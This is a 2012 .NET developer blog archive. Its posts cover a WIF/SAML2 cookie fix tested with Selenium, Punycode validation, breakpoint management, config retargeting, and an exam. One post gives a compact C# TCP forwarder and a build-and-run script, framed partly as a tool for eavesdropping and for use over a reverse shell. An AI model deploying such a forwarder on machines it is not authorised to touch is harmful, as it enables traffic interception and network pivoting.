Wednesday, December 12, 2012

Pitfalls on WIF+SAML2 and Selenium

WIF and SAML 2.0

First, some background: there is a known issue in WIF (Windows Identity Foundation) for SAML 2.0 that generates cookies whose name is a GUID and whose value is base64 encoded data that grows with every SAMLRequest the module handles. The decoded value looks like: 0;1;2;3;4;5;6;7;8;9;10;11;12;13;14;15
It starts small but gets really, really large.

Every client gets one of these cookies, and each time it is bigger, to the point that when it is sent back to the server, an HTTP error is thrown: HTTP 400 - Bad Request (Request Header too long)

This MSDN link has a comment with the first steps to take in case you end up with this problem. They are very straightforward, and we had done them even before ending up on that MSDN page. Regarding their fourth step (the final "fix"), in our case we decided on a different solution.

The solution here was to remove the cookies before they were sent out to the user in the first place. This way, even though for a very short time the cookies existed in memory on the server, the client never learned of their existence. To achieve that, login and logout had to be changed; that is, the SignIn and RedirectingToIdentityProvider events of the Saml2AuthenticationModule. At that point in the event pipeline, the underlying Microsoft WIF code has already added the cookies to the Response, which gives us the opportunity to remove them before the headers are sent out to the client.
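As a sketch of the idea (the names below are mine, not the actual production code), the handlers can detect the offending cookies by their GUID-prefixed names. In the real SignIn and RedirectingToIdentityProvider handlers you would enumerate HttpContext.Current.Response.Cookies and expire the matches before the headers are flushed; here the detection logic is factored into a plain helper:

```csharp
using System;
using System.Collections.Generic;
using System.Linq;

// Hypothetical helper: detects the WIF/SAML2 chunk cookies, whose names are
// a GUID optionally followed by a sequence number.
public static class WifCookieSweeper
{
    public static bool IsWifChunkCookie(string name)
    {
        // A GUID in "D" format is 36 characters; WIF may append a chunk index.
        Guid ignored;
        return name != null
            && name.Length >= 36
            && Guid.TryParse(name.Substring(0, 36), out ignored);
    }

    // In the real event handlers, this filter would run over the names in
    // Response.Cookies; here it just filters a plain list of names.
    public static IEnumerable<string> FindChunkCookies(IEnumerable<string> cookieNames)
    {
        return cookieNames.Where(IsWifChunkCookie);
    }
}
```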

Which takes us to Selenium:

The final solution had to be tested before dropping a new build to production, and to test it, we had to reproduce it. The issue had not shown up in the Dev or QA environments, so the first step was to be able to reproduce it in a controlled environment.

Basically, the idea was to use Selenium to simulate a few dozen users logging in and out in parallel until a cookie whose name matched a GUID (plus a number?) was received by one of the clients. There was no need to let it grow to the point of getting: HTTP 400 - Bad Request (Request Header too long)

For that, I wrote a small application to spawn a thread for each IWebDriver (threads from the pool were conflicting with the drivers), each logging in with a different user account, removing the cookies (so the user would be challenged again) and starting over.
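A rough sketch of that harness, assuming the Selenium work (create the IWebDriver, log in, check and delete cookies) is wrapped into a delegate; the class and method names are mine:

```csharp
using System;
using System.Collections.Generic;
using System.Threading;

// Sketch of the load harness: one dedicated thread per simulated user
// (ThreadPool threads conflicted with the drivers, hence plain Threads).
// The Selenium work itself is injected as a delegate; in the real test each
// worker created its own IWebDriver and ran the login/clear-cookies loop.
public class LoginLoadHarness
{
    public static void Run(int users, int iterations, Action<int> loginCycle)
    {
        var threads = new List<Thread>();
        for (int u = 0; u < users; u++)
        {
            int user = u; // capture a fresh copy per thread
            var t = new Thread(() =>
            {
                for (int i = 0; i < iterations; i++)
                    loginCycle(user); // login, check cookies, delete, repeat
            });
            threads.Add(t);
            t.Start();
        }
        // wait for every simulated user to finish
        threads.ForEach(t => t.Join());
    }
}
```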

The code would detect the existence of the cookie and stop the test, but to make the cookies going in and out visible, we can load the Selenium driver with Firebug enabled, with the Cookies panel enabled and visible by default.

That goes like:

const string firebug = @"firebug-1.10.6-fx.xpi";
IWebDriver driver;
if (includeFireBug && File.Exists(firebug))
{
    var profile = new FirefoxProfile();
    profile.AddExtension(firebug); // install the Firebug xpi into the profile
    // Set default Firebug preferences
    profile.SetPreference("extensions.firebug.currentVersion", "1.10.6");
    profile.SetPreference("extensions.firebug.allPagesActivation", "on");
    profile.SetPreference("extensions.firebug.defaultPanelName", "cookies");
    profile.SetPreference("extensions.firebug.cookies.enableSites", true);
    driver = new FirefoxDriver(profile);
}
else
{
    driver = new FirefoxDriver();
}

I mentioned the code would check the cookies looking for the GUID one, and with the Selenium API it's very simple to do so:

Guid test;
if (driver.Manage().Cookies.AllCookies.Any(p => p.Name.Length >= 37 
    && Guid.TryParse(p.Name.Substring(0, 36), out test)))

It just checks whether the name is long enough to be a GUID, then tries to parse the GUID part of it (note that WIF appends a sequential number to split the value into cookies of about 2 KB each).

Two domains were involved in this test: the service provider and the identity provider.

Initially I set the IWebDriver Url property to the service provider, found the element for Login and fired a click. That would invoke the SAML module, which would redirect the client to the identity provider.

The login and password input elements would be filled in and the login button triggered on the IdP page.
At this point, the session cookie from the IdP was sent to the browser under the IdP's domain, and the client was redirected back to the service provider, where the SAML flow finished and the service provider's session cookies were also sent to the client.

That's all we needed to reproduce the issue. However, these steps had to be done over and over, several times, until the issue happened. In our particular case, Logout was not possible since the accounts used were test accounts and thus not validated, so simply deleting the cookies would let us restart the flow (and save us some requests/time). But this means deleting the cookies from both domains.

Using the Selenium API, I called DeleteAllCookies.

Even though the method is called DeleteAllCookies, it deletes only the cookies of the domain the WebDriver is currently on; in this case, the service provider's domain, since the user had just landed there after the SAML login.
Looping over the Cookies collection from within the WebDriver would obviously also return only the cookies from the current domain.

Time for a second maneuver:
Set the Url property of the WebDriver to anywhere under the IdP's domain that wouldn't respond with a redirect, and call DeleteAllCookies again. That simple.
I browsed the root of the domain, without specifying any resource, which returned 403.14 - Directory listing denied. That was enough to run code like:

// right after the login flow finished (landed on the service provider, logged in)
driver.Manage().Cookies.DeleteAllCookies(); // deletes the service provider's cookies
driver.Url = "";                            // the IdP URL goes here
driver.Manage().Cookies.DeleteAllCookies(); // deletes the IdP's cookies

After that, the flow could be re-initiated. After a few hundred iterations, we could reproduce the issue, add the fix and run the test again with thousands of logins, without any issues.

Saturday, November 10, 2012

Top level domains and punycode with C#

Punycode is used to encode Unicode characters into ASCII for IDN (Internationalized domain name).

On the RFC 3492 you'll find:

"Punycode is a simple and efficient transfer encoding syntax designed for use with Internationalized Domain Names in Applications (IDNA). It uniquely and reversibly transforms a Unicode string into an ASCII string."

Now, if you are looking into validating TLDs (top level domains), you must keep that in mind. The ICANN list of TLDs also contains the IDN ccTLDs that started to be included in 2010.

Some of the entries on that list are Punycode encoded; the XN-- prefix makes it easy to identify the Punycode encoded strings.

Luckily, since version 2.0, the .NET Framework offers a class to deal with IDN (Punycode and the Nameprep it has to do prior to encoding): System.Globalization.IdnMapping.
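For instance (a hypothetical wrapper; the bücher example is mine, not from the ICANN list), the round trip looks like this:

```csharp
using System.Globalization;

public static class PunycodeDemo
{
    // GetAscii encodes a Unicode domain (or label) into its Punycode/ACE
    // form; GetUnicode decodes it back.
    public static string ToAce(string unicodeDomain)
    {
        return new IdnMapping().GetAscii(unicodeDomain);
    }

    public static string ToUnicode(string aceDomain)
    {
        return new IdnMapping().GetUnicode(aceDomain);
    }
}
```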


My goal was to receive a TLD (string) and validate it against the ICANN list of TLDs. My first snippet threw an exception on the GetAscii call:
var tld = ".ਭਾਰਤ";
if (Regex.IsMatch(tld, @"[^\u0000-\u007F]"))
    tld = _IdnMapping.GetAscii(tld);
The exception message was: IDN labels must be between 1 and 63 characters long.

My speed reading techniques are quite bad... in fact I don't have any. Sometimes I just focus on what I believe to be the most important part of the message (in this case "1 and 63 characters long", which didn't make sense) and end up missing something important (IDN labels).

I googled the exception, finding only those very useful (?!?) exception translation websites and nothing more.
Only after rereading the message did I realize that the catch was that IdnMapping works with domain name labels:

"A constituent part of a domain name. The labels of domain names are connected by dots. For example, "www.iana.org" contains three labels — "www", "iana" and "org". For internationalized domain names, the labels may be referred to as A-labels and U-labels."

Therefore, my input was simply broken, considering it started with a dot. If you are looking to validate the complete list of TLDs, including ccTLDs, or even a complete domain with multiple labels supporting IDN, the IdnMapping class is the way to go. However, make sure your input does not have leading or trailing dots; Trim('.') it or something.
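A minimal sketch of that normalization, assuming the result is then compared against the ICANN list (which is published in uppercase); the class name and details are mine:

```csharp
using System.Globalization;
using System.Text.RegularExpressions;

// Hypothetical validator helper: strips leading/trailing dots (IdnMapping
// works on labels, not ".label") and converts IDN input to its ASCII form
// before it would be compared against the ICANN TLD list.
public static class TldNormalizer
{
    static readonly IdnMapping _idn = new IdnMapping();

    public static string ToComparableForm(string tld)
    {
        var label = tld.Trim('.'); // avoid the empty-label exception
        if (Regex.IsMatch(label, @"[^\u0000-\u007F]"))
            label = _idn.GetAscii(label); // non-ASCII: encode to Punycode
        return label.ToUpperInvariant();  // the ICANN list is uppercase
    }
}
```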

Regarding IDNA versions: the .NET Framework prior to version 4.5 works with IDNA 2003. If you are running .NET Framework 4.5 on Windows 8, IDNA 2008 will be used.

Tuesday, October 9, 2012

Simple TCP Forwarder in C#

When people ask "What would I use a TCP forwarding tool for?",
the answer normally goes like "to eavesdrop on someone's connection".

Most of our connections go over SSL (at least the most important ones), and the certificate would be invalidated if a MITM attack were ongoing.

There are some troubleshooting situations where one would use a TCP forwarding tool as a proxy from one box to another, but on what basis this technique/tool is used can vary a lot.

There are many TCP forwarding tools available on the web. However, the truth is that no one wants to pull a whole solution out of a compressed file and fire up Visual Studio when accessing a computer via the command line (read: reverse shell, anyone?). On top of that, I wanted to have some fun, so I decided to write one.

And how complicated is it to write a TCP forwarding tool, or a TCP proxy if you prefer, in C#?

It takes only 66 lines of code using the plain Socket class. And it's fun!
using System;
using System.Net;
using System.Net.Sockets;

namespace BrunoGarcia.Net
{
    public class TcpForwarderSlim
    {
        private readonly Socket _mainSocket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);

        public void Start(IPEndPoint local, IPEndPoint remote)
        {
            _mainSocket.Bind(local);
            _mainSocket.Listen(5);
            while (true)
            {
                var source = _mainSocket.Accept();
                var destination = new TcpForwarderSlim();
                var state = new State(source, destination._mainSocket);
                destination.Connect(remote, source);
                source.BeginReceive(state.Buffer, 0, state.Buffer.Length, 0, OnDataReceive, state);
            }
        }

        private void Connect(EndPoint remoteEndpoint, Socket destination)
        {
            var state = new State(_mainSocket, destination);
            _mainSocket.Connect(remoteEndpoint);
            _mainSocket.BeginReceive(state.Buffer, 0, state.Buffer.Length, SocketFlags.None, OnDataReceive, state);
        }

        private static void OnDataReceive(IAsyncResult result)
        {
            var state = (State)result.AsyncState;
            try
            {
                var bytesRead = state.SourceSocket.EndReceive(result);
                if (bytesRead > 0)
                {
                    state.DestinationSocket.Send(state.Buffer, bytesRead, SocketFlags.None);
                    state.SourceSocket.BeginReceive(state.Buffer, 0, state.Buffer.Length, 0, OnDataReceive, state);
                }
            }
            catch
            {
                state.DestinationSocket.Close();
                state.SourceSocket.Close();
            }
        }

        private class State
        {
            public Socket SourceSocket { get; private set; }
            public Socket DestinationSocket { get; private set; }
            public byte[] Buffer { get; private set; }

            public State(Socket source, Socket destination)
            {
                SourceSocket = source;
                DestinationSocket = destination;
                Buffer = new byte[8192];
            }
        }
    }
}

No rocket science here: using both asynchronous (good old CLR APM in this case) and synchronous Socket programming, a few lines of C# with one method exposed as an entry point taking the endpoints as parameters.

When I say asynchronous and synchronous, it's because the code calls three synchronous methods of the Socket class. The first is Socket.Accept(), which blocks the thread until a connection is received. I chose this technique so that the Start method would never return and the main thread would handle the main socket.

The second synchronous method used is Socket.Send. This method also blocks the thread (in this case a thread from the ThreadPool, due to the async I/O that fired the receive callback). When one socket receives data, it forwards it to the second socket synchronously, before asynchronously starting to receive data again.

In fact, in a few tests I ran (where one socket simply flushes its whole buffer to a second socket), BeginSend (the asynchronous Socket.Send) performed slower than the synchronous Send.

Third, Socket.Connect(), which initiates the connection with the remote endpoint: where you want the data you send to the program to be forwarded to.

Once a connection is established, APM is used with BeginReceive/EndReceive to receive data. This means each pair of sockets will receive data using APM and use the same thread from the pool that called the callback to send the data to the other socket.

Let's run it!

Previously, I just wrote a class, right? That's far from having an executable.
As I mentioned before, my idea here was not to have yet another TCP forwarding tool on GitHub, CodePlex or CodeProject, with dozens of files, just so we could forward some data.

So I propose a small change to the code above:
Let's add a static Main method to that class and build it as a command-line application:

        static void Main(string[] args)
        {
            new TcpForwarderSlim().Start(
                new IPEndPoint(IPAddress.Parse(args[0]), int.Parse(args[1])),
                new IPEndPoint(IPAddress.Parse(args[2]), int.Parse(args[3])));
        }

After that we can compile it with:

csc /o+ /debug- /out:TcpForwarder.exe /t:exe TcpForwarderSlim.cs

Even though I used C# compiler version 4.0.30319.17020, the code will compile just fine even with version 2.0 of the .NET Framework. The generated assembly is 5,632 bytes.

Let's try it out by browsing xkcd. We get their IP address and set up the tunnel:

Pinging [] with 32 bytes of data:

C:\>TcpForwarder.exe 12345 80

Viewing xkcd via TCP Tunnel
Great comics by the way! As usual.

Notice the address bar contains localhost:12345, which makes sense considering we set up the tunnel with port 12345 as the local endpoint. At the bottom of the screenshot, the Firefox extension DNS Flusher shows ::1, which is the loopback address in IPv6.

If you think I might have a copy of xkcd comic number 1118 on my hard drive (the whole page, actually) and a web server bound to port 12345, that's not the case. :)

Now we have a class file with 73 lines of code (after adding the static Main method), but there's still some manual work to get the tunnel running. So let's try to automate this a bit more. Perhaps scripting the whole thing?!

The code can be a lot smaller with minification. I got a nice hint on Stack Overflow: use Visual Studio find and replace with the regex :Wh+ (the old Visual Studio pattern for a run of whitespace).

We create a script, let's say buildTcpForwarder.cmd, not forgetting to escape the > sign with ^ so that the interpreter ignores it. Note that I have the path to the C# compiler (csc.exe) in my PATH environment variable.

echo using System; using System.Net; using System.Net.Sockets; namespace BrunoGarcia.Net { public class TcpForwarderSlim { private readonly Socket MainSocket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); static void Main(string[] args) { new TcpForwarderSlim().Start( new IPEndPoint(IPAddress.Parse(args[0]), int.Parse(args[1])), new IPEndPoint(IPAddress.Parse(args[2]), int.Parse(args[3]))); } public void Start(IPEndPoint local, IPEndPoint remote) { MainSocket.Bind(local); MainSocket.Listen(5); while (true) { var source = MainSocket.Accept(); var destination = new TcpForwarderSlim(); var state = new State(source, destination.MainSocket); destination.Connect(remote, source); source.BeginReceive(state.Buffer, 0, state.Buffer.Length, 0, OnDataReceive, state); } } private void Connect(EndPoint remoteEndpoint, Socket destination) { var state = new State(MainSocket, destination); MainSocket.Connect(remoteEndpoint); MainSocket.BeginReceive(state.Buffer, 0, state.Buffer.Length, SocketFlags.None, OnDataReceive, state); } private static void OnDataReceive(IAsyncResult result) { var state = (State)result.AsyncState; try { var bytesRead = state.SourceSocket.EndReceive(result); if (bytesRead ^> 0) { state.DestinationSocket.Send(state.Buffer, bytesRead, SocketFlags.None); state.SourceSocket.BeginReceive(state.Buffer, 0, state.Buffer.Length, 0, OnDataReceive, state); } } catch { state.DestinationSocket.Close(); state.SourceSocket.Close(); } } private class State { public Socket SourceSocket { get; private set; } public Socket DestinationSocket { get; private set; } public byte[] Buffer { get; private set; } public State(Socket source, Socket destination) { SourceSocket = source; DestinationSocket = destination; Buffer = new byte[8192]; } } } } > source.cs

csc /o+ /debug- /out:TcpForwarder.exe /t:exe source.cs

TcpForwarder.exe %1 %2 %3 %4

Now just call the script:

C:\buildTcpForwarder.cmd 12345 80

C:\>echo using System; using System.Net; using System.Net.Sockets; na
mespace BrunoGarcia.Net { public class TcpForwarderSlim { private readonly Sock
et MainSocket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, Protoc
olType.Tcp); static void Main(string[] args) { new TcpForwarderSlim().Start( new
 IPEndPoint(IPAddress.Parse(args[0]), int.Parse(args[1])), new IPEndPoint(IPAddr
ess.Parse(args[2]), int.Parse(args[3]))); } public void Start(IPEndPoint local,
IPEndPoint remote) { MainSocket.Bind(local); MainSocket.Listen(5); while (true)
{ var source = MainSocket.Accept(); var destination = new TcpForwarderSlim(); va
r state = new State(source, destination.MainSocket); destination.Connect(remote,
 source); source.BeginReceive(state.Buffer, 0, state.Buffer.Length, 0, OnDataRec
eive, state); } } private void Connect(EndPoint remoteEndpoint, Socket destinati
on) { var state = new State(MainSocket, destination); MainSocket.Connect(remoteE
ndpoint); MainSocket.BeginReceive(state.Buffer, 0, state.Buffer.Length, SocketFl
ags.None, OnDataReceive, state); } private static void OnDataReceive(IAsyncResul
t result) { var state = (State)result.AsyncState; try { var bytesRead = state.So
urceSocket.EndReceive(result); if (bytesRead > 0) { state.DestinationSocket.Send
(state.Buffer, bytesRead, SocketFlags.None); state.SourceSocket.BeginReceive(sta
te.Buffer, 0, state.Buffer.Length, 0, OnDataReceive, state); } } catch { state.D
estinationSocket.Close(); state.SourceSocket.Close(); } } private class State {
public Socket SourceSocket { get; private set; } public Socket DestinationSocket
 { get; private set; } public byte[] Buffer { get; private set; } public State(S
ocket source, Socket destination) { SourceSocket = source; DestinationSocket = d
estination; Buffer = new byte[8192]; } } } }  1>source.cs

C:\>csc /o+ /debug- /out:TcpForwarder.exe /t:exe source.cs
Microsoft (R) Visual C# 2010 Compiler version 4.0.30319.17020
Copyright (C) Microsoft Corporation. All rights reserved.

C:\>TcpForwarder.exe 12345 80

The source file is generated and built, and the tunnel starts with the parameters we passed to the script, so we can check xkcd once more via TCP forwarding.

Wednesday, August 8, 2012

Organizing Debugging Sessions

When working with enterprise applications, with thousands of lines of code (aka KLOC) and hundreds of references, several techniques are used to improve productivity when it comes to debugging. It's very common to end up debugging the same portion of the system from time to time, and too often the relevant source files come from different solutions, spread across a huge source tree.

Once we are done debugging something, we perhaps don't delete the breakpoints before starting to debug something else, and we get stuck hitting those "old" breakpoints. The first reflex is to hit F5 so the flow can continue, until it happens enough times that we actually remove them. For me at least, that's a bit annoying and counterproductive.

Perhaps we just Disable all breakpoints? Fine, that works well, but you keep doing it until the point where you enable them all again to get a few back, and end up with several breakpoints you really don't need. And the annoying behavior starts again.

The last option would be to delete all breakpoints when you start debugging something else. However, at some point you'll wish you still had those breakpoints, especially the Conditional ones or those with When Hit / Run a macro actions, because you are back looking at that portion of the system once more.

But wait! Who said that was the last option?

This is where Import and Export breakpoints in Visual Studio has its best use. You can read a lot about "handing off a debugging session to another developer" as the main reason to use it, and that's certainly valid, but I believe the most common reason would be to organize your own debugging sessions.

My objective here is not to describe how to import and export breakpoints; it is very straightforward and documented on MSDN. I'd like to point out that, just as we keep T-SQL scripts saved to make our lives easier when troubleshooting database related issues, saving your breakpoints can save you a lot of time when debugging code.

This is most useful when working with huge applications, where many source files that are part of your debugging are not part of the solution you have loaded in Visual Studio. Once you have imported your breakpoints, you can easily open any file by double clicking its breakpoint in the Breakpoints window (CTRL + D, B).

If you don't organize your debug sessions by importing and exporting breakpoints, give it a try!

Friday, June 29, 2012

Paranoid android

I have found it quite hard to trust nearly any application for many years, when you think of the underlying infrastructure that exists to let you hit a server and download a piece of software, and everything that could go wrong.

What if I'm hitting a spoofed DNS server?
What if my access point was cracked?
What if someone hacked the telco router and is diverting my traffic through another box?
Or what if I already have some piece of software installed, eavesdropping on my browsing?

This paranoid list could go on forever. Obviously there's something you can do to avoid or monitor each of these items, but the truth is that you can never say, with 100% certainty, that every page you hit will be harmless, that there is no malicious code running on your computer, or that some piece of software is completely safe to execute without privacy concerns.

When you think about all these exploits coming out, for all kinds of software, you can get quite paranoid.
On Windows, you click a file with a .docx extension and you know Word will fire up and parse that file.
There have already been problems with Microsoft Office, Flash and several other programs where parsing a file would execute shellcode stored in it, and you would have no idea by looking at its Word document icon.
What about web related security issues? I suppose I'm not the only paranoid one, am I?

I'm going on a trip this weekend and I decided to download a set from Astrix from YouTube. That's legal, right? Can I write that here? Anyhow, I changed my mind and didn't! ;)

There are tons of websites dedicated to that, but they aren't happy to convert videos longer than 1 hour, so I had to think of another way.

I have long known that it's always a bad idea to download these "tools", but I decided to give it a try.
I found a mainstream one, from DVDVideoSoft, called Free YouTube to MP3.

I downloaded the quite big package, 26 MB... and the first thing that popped into my head was:

Unlike Stuxnet and Duqu which had a specific target, Flame is more generic and its size is 20 mega bytes, which is huge considering that anti-virus experts have seen codes of just 1 mb so far

I waited for the antivirus to pop up or something, calling me stupid, but nothing happened.
Since the paranoia doesn't go away, I thought: let's check if the file is signed.

All seemed good; time to get some Astrix!
I ran that stuff, read (ok, like 20% of) the privacy agreement, everything went fine and I fired up the app.

Aha! So now I get two windows: one from the app, and the other from Symantec Antivirus!
My thoughts, over the course of 3.2 milliseconds, were:
  • F%$*& I knew this was crap.
  • This means that all the other apps I executed, where my antivirus didn't pop up, were freaking malware?
  • False positive maybe? Try not to be too paranoid dude!
  • I suppose the reverse shell is running right now.... 

The message from the antivirus was:


Target:  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.1000.157.105\Bin\ccSvcHst.exe
Event Info:  Create Process
ActionTaken:  Blocked

And again:


Target:  C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.1000.157.105\Bin\SavUI.exe
Event Info:  Create Process
ActionTaken:  Blocked

This kind of situation does not help a paranoid guy. In the end I uninstalled the program and made plans for a new VM where I can grow a colony of viruses while testing stuff out.


I'm currently reading CLR via C# by Jeffrey Richter, and where he talks about .NET Framework deployment goals and why Microsoft Windows has a reputation for being unstable and complicated, I found something I think is worth quoting here:

"... The third reason has to do with security. When applications are installed, they come with all kinds of files, many of them written by different companies. In addition, Web applications frequently have code (like ActiveX controls) that is downloaded in such a way that users don't even realize that code is being installed on their machine. Today, this code can perform any operation, including deleting files or sending e-mail. Users are right to be terrified of installing new applications because of the potential damage they can cause. To make users comfortable, security must be built into the system so that the users can explicitly allow or disallow code developed by various companies to access their system's resources."

- Jeffrey Richter, CLR via C# third edition.

This paragraph, and especially the text highlighted (by me), gives me the feeling I'm not alone in this paranoia. :)

Tuesday, May 22, 2012

Re-targeting multiple Asp.Net Web App from 3.5 to 4

I understand it's a bit late to be doing this, but better late than never: I got this .NET Framework 3.5 project to convert to .NET Framework 4...

The easiest way I know is to switch a value in a selection box and let Visual Studio do the changes for you.

However, my situation was that I had several configuration files to convert.
I found instructions on MSDN to perform the conversion manually and wrote each step into a quick-and-dirty command line application:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Xml.Linq;
using System.Xml.XPath;
using System.IO;

namespace RetargetFramework4
{
    class Program
    {
        static void Main(string[] args)
        {
            bool deleteWebServerSection = true;

            // The justrun param will let it go without interruptions (and WILL execute step 7)
            if (args == null || !args.Any() || args[0] != "justrun")
            {
                // try to make the user give up
                if (!Confirm(@"
This code runs the steps from the MSDN article on all files ending with .config in the current folder.
Make sure you have them backed up.

Step 1: Make sure that the application currently targets ASP.NET 3.5!

Step 9: If you have customized the Web.config file, and if any customizations refer to custom assemblies or classes, make sure that the assemblies or classes are compatible with the .NET Framework version 4.

Are you sure you want to continue? (y/n)"))
                    return;

                deleteWebServerSection = ShallPerformStepSeven();
            }

            var configs = Directory.GetFiles(".", "*.config");
            Console.WriteLine("{0}Found {1}", Environment.NewLine, string.Join(", ", configs));

            ProcessConfigs(configs, deleteWebServerSection);
        }

        private static bool ShallPerformStepSeven()
        {
            return Confirm(@"
Please note that:
Step 7 is: Delete everything between the system.webServer section start and end tags, but leave the tags themselves.
But in fact retargeting a Web project from the project property tab with Visual Studio 2010 does NOT remove all child elements!

Do you want to execute this step? (y/n)");
        }

        private static void ProcessConfigs(IEnumerable<string> configs, bool deleteWebServerSection)
        {
            foreach (var config in configs)
            {
                // 2 - Open the Web.config file in the application root.
                var xConfig = XDocument.Load(config);

                // 3 - In the configSections section, remove the sectionGroup element that is named "system.web.extensions".
                var webExtensions = xConfig
                    .XPathSelectElements("configuration/configSections/sectionGroup")
                    .FirstOrDefault(e => (string)e.Attribute("name") == "system.web.extensions");
                if (webExtensions != null)
                    webExtensions.Remove();

                // 4 - In the system.web section, in the compilation collection, remove every add element that refers to an assembly of the .NET Framework.
                var assembliesAdd = (from a in xConfig.XPathSelectElements("configuration/system.web/compilation/assemblies/add")
                                     let assembly = (string)a.Attribute("assembly")
                                     where assembly != null && assembly.StartsWith("System.")
                                     select a).ToList();
                if (assembliesAdd.Any())
                    assembliesAdd.Remove();

                // 5 - Add a targetFramework attribute to the compilation element in the system.web section:
                var compilation = xConfig.XPathSelectElements("configuration/system.web/compilation").FirstOrDefault();
                if (compilation != null)
                    compilation.SetAttributeValue("targetFramework", "4.0");

                // 6 A - In the opening tag for the pages section, add a controlRenderingCompatibilityVersion attribute:
                var pages = xConfig.XPathSelectElements("configuration/system.web/pages").FirstOrDefault();
                if (pages != null)
                    pages.SetAttributeValue("controlRenderingCompatibilityVersion", "3.5");

                // 6 B - In the system.codedom section, in the compilers collection, remove the compiler elements for c# and vb.
                var codedom = (from a in xConfig.XPathSelectElements("configuration/system.codedom/compilers/compiler")
                               let language = (string)a.Attribute("language")
                               where language != null
                               && (language.StartsWith("c#") || language.StartsWith("vb"))
                               select a).ToList();
                if (codedom.Any())
                    codedom.Remove();

                // 7 - Delete everything between the system.webServer section start and end tags, but leave the tags themselves.
                if (deleteWebServerSection)
                    foreach (var webServer in xConfig.XPathSelectElements("configuration/system.webServer"))
                        webServer.RemoveNodes();

                // 8 - Delete everything between the runtime section start and end tags, but leave the tags themselves.
                foreach (var runtime in xConfig.XPathSelectElements("configuration/runtime"))
                    runtime.RemoveNodes();

                xConfig.Save(config, SaveOptions.None);
                Console.WriteLine("Finished with {0}.", config);
            }
        }

        private static bool Confirm(string message)
        {
            Console.WriteLine(message);
            return Console.ReadKey().KeyChar == 'y';
        }
    }
}

Use it in a script if you'd like, to re-target an ASP.NET Web Application from version 3.5 to 4.0.
It can be useful to re-target many applications, with multiple web.configs, from the command prompt:

for /f %a in ('dir /s /b web.config') do cd %a\.. & RetargetFramework4.exe justrun 
Note that if you are calling it from within a batch (.bat or .cmd) script file, % becomes %%.

Make sure your config files are not marked read-only (they probably will be if you are using source control and haven't checked them out). So check them out or remove the read-only attribute:

attrib -r web.config

Sunday, May 20, 2012

Google Maps vs Bing Maps

After planning trips for about 30 countries, road trips or not, my browser learned that when I press m, I'm looking for Google Maps:

This time my trip goes through Bosnia and Herzegovina, and there was a problem: Google Maps won't find routes through it.

We could not calculate directions between Belgrade, Serbia and Sarajevo, Bosnia and Herzegovina.

Another test showed that this happens not only for routes from outside Bosnia, but also within the country:

We could not calculate directions between Banja Luka, Bosnia and Herzegovina and Sarajevo, Bosnia and Herzegovina.

That's when I gave Bing Maps a try. It was a moment of surprise to see the route calculated, until I noticed it looked quite weird:

Belgrade - Sarajevo with Bing Maps
The route created was clearly too long: 394 kilometers (244 miles).

After some quick research, I found on the Sarajevo wikitravel page:

From Belgrade (Serbia) - taking direction to Sabac - Zvornik - Vlasenica - Sokolac - Sarajevo.

Using this tip, I decided to "help" Bing Maps by adding these locations along the way. The result, to say the least, was funny! :)

Belgrade - Sarajevo and more with Bing Maps

A route of 632 kilometers (392 miles), completely insane!

The situation: Google Maps won't give directions involving a location inside Bosnia, and Bing Maps seems to make fun of me. Finally, and surprisingly, I got it with Via Michelin.

Belgrade - Sarajevo with Via Michelin

A route of 305 kilometers (189 miles).

In today's battle of Microsoft vs Google, the winner was Michelin!

Friday, April 27, 2012

MCPD upgrade, 70-523 exam

So today I finally took the 70-523 exam in order to upgrade the certification with the longest title ever created:

Microsoft Certified Professional Developer .Net Framework 3.5 Web Developer
Microsoft Certified Professional Developer .Net Framework 4 Web Developer

Two characters shorter now, though.

It's been almost a year and a half since I did the 70-567, the upgrade from .Net 2.0 to 3.5, which means I was already late, considering .Net 4.0 had already launched. The .Net Framework 4.5 is in Developer Preview, so I guess I could finally catch up.

Like the 70-567 exam, this one was composed of more than one exam. "An exam within an exam", Leonardo once said. In the case of 70-523, there were 4 exams:

TS Accessing Data with Microsoft .Net Framework 4
TS Windows Communication Foundation Development with Microsoft .Net Framework 4
TS Web Applications Development with Microsoft .Net Framework 4
Pro: Designing and developing Web Applications Using Microsoft .Net Framework 4

Which means you get 3 MCTS and 1 MCPD certificates.

The countdown was per exam, 40 minutes each, which was more than enough considering the questions are straightforward, with little text to read.
The way Microsoft does these tests is interesting. I've been taking these exams since 2006 and it has always been the same. By "the way", I mean you normally select 1 out of 4 options, or select 2 out of 6, where:

Each option is a complete solution
Both answers together make the solution

The idea that "it's never something too hard to do" is always valid and really helps when you are not sure about the answer. They do always include some questions about things you'll never see in your life, but you shouldn't have a hard time if you use the principle: "It's never too complicated".

So they asked something like:

You work for Lorem Ipsum Inc. and you have a WCF service; you must log all message exchanges. What do you do?

A - Create this config <binding>tralálá..</binding>
B - Create a new project, reference your old service assemblies in the new project, delete the Chrome shortcut from your desktop and make sure you use Internet Explorer and Bing.
C - Copy paste the service implementation and deploy both services on the same server.
D - Buy a new server, setup load balance and deploy your service.

Ok. I made it sound extremely ridiculous, but I want to prove a point here: Which one would you select?
Even if you have no idea what the above text is talking about, if you follow the principle I mentioned, you would select the first option.
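For the record, the unglamorous real-life version of option A is enabling WCF message logging in configuration: the system.serviceModel diagnostics section plus a trace listener for the System.ServiceModel.MessageLogging source. A rough sketch (the listener name and log file path here are just illustrative):

```xml
<system.serviceModel>
  <diagnostics>
    <messageLogging logEntireMessage="true"
                    logMessagesAtServiceLevel="true"
                    logMessagesAtTransportLevel="true" />
  </diagnostics>
</system.serviceModel>
<system.diagnostics>
  <sources>
    <source name="System.ServiceModel.MessageLogging">
      <listeners>
        <add name="messages"
             type="System.Diagnostics.XmlWriterTraceListener"
             initializeData="c:\logs\messages.svclog" />
      </listeners>
    </source>
  </sources>
</system.diagnostics>
```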

How to be prepared? I'm hoping you have a full-time job working with Microsoft technology; that really helps! Plus, in most places you work you don't get the chance to use every single new thing Microsoft launches as part of a new release of the .Net Framework, so having a private project, or at least playing with it at home once in a while, does help. On top of that, there is the standard way of studying (I suppose it's still the standard): books.

I read these 3:

MCTS Self-Paced Training Kit (Exam 70-515): Web Applications Development with Microsoft .NET Framework 4 (Mcts 70-515 Exam Exam Prep)

